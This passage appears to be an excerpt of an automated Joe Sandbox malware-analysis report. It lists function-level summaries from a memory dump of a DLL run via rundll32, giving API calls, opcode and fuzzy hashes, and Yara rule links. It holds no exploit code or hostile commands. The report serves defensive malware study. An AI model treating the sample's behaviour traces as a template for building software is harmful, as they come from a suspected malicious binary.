Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64

Uniqueness

Uniqueness Score: -1.00%

Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100266F4
GetRgnBox.GDI32(?,?), ref: 1002676F
IntersectRect.USER32(?,?,?), ref: 10026784
EqualRect.USER32 ref: 10026792

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001FCF4

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

__CxxThrowException@8.LIBCMT ref: 1001FD2A
FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53

Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA

LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754

Uniqueness

Uniqueness Score: -1.00%

Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 100170A7
LoadResource.KERNEL32(?,00000000), ref: 100170AF
LockResource.KERNEL32(00000000), ref: 100170C1
FreeResource.KERNEL32(00000000), ref: 1001710B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001512A

Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D

__strdup.LIBCMT ref: 1001514C
GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
GetCurrentThreadId.KERNEL32 ref: 10015182

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04

Uniqueness

Uniqueness Score: -1.00%

Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
RegCloseKey.ADVAPI32(00000000), ref: 1001774B
_swprintf.LIBCMT ref: 10017768
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5

Uniqueness

Uniqueness Score: -1.00%

Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 10017C70
LoadResource.KERNEL32(?,00000000), ref: 10017C7C
LockResource.KERNEL32(00000000), ref: 10017C8A
FreeResource.KERNEL32(00000000), ref: 10017CB8

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

IntersectRect.USER32(?,00000000,?), ref: 1002669C
EqualRect.USER32 ref: 100266A9
IsRectEmpty.USER32 ref: 100266B3
InvalidateRect.USER32(?,?,?), ref: 100266D0

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
DuplicateHandle.KERNEL32 ref: 10021651
GetLastError.KERNEL32(?), ref: 1002166C

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32 ref: 100155F0

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetFocus.USER32 ref: 10015607
GetParent.USER32(?), ref: 10015615
SendMessageA.USER32 ref: 10015628

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: EnableException@8FocusItemMenuMessageParentSendThrow
String ID:
API String ID: 4211600527-0
Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(00000000), ref: 1001B97C
GetTopWindow.USER32(00000000), ref: 1001B9BB
GetWindow.USER32(00000000,00000002), ref: 1001B9D9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1001B338
GetTopWindow.USER32(00000000), ref: 1001B34B

Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392

GetTopWindow.USER32(?), ref: 1001B37B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003CA19

Part of subcall function 1003C844: __fltout2.LIBCMT ref: 1003C86E

__cftog_l.LIBCMT ref: 1003CA3F
__cftoe_l.LIBCMT ref: 1003CA71

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82

Uniqueness

Uniqueness Score: -1.00%

Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 1002BC45
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA

__amsg_exit.LIBCMT ref: 1003A571
__lock.LIBCMT ref: 1003A581
InterlockedDecrement.KERNEL32(?), ref: 1003A59E
InterlockedIncrement.KERNEL32(00521520), ref: 1003A5C9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 1001DCA7
LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,503BE811), ref: 1001DCB3
LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,503BE811), ref: 1001DCC0
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,503BE811), ref: 1001DCDB

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6

Uniqueness

Uniqueness Score: -1.00%

Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(000000FF,00000001), ref: 100174ED
GetActiveWindow.USER32 ref: 100174F8
SetActiveWindow.USER32(000000FF), ref: 10017506
FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522

Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16

Uniqueness

Uniqueness Score: -1.00%

Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1002E228
GetTickCount.KERNEL32 ref: 1002E235
CoFreeUnusedLibraries.OLE32 ref: 1002E244
GetTickCount.KERNEL32 ref: 1002E24A

Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
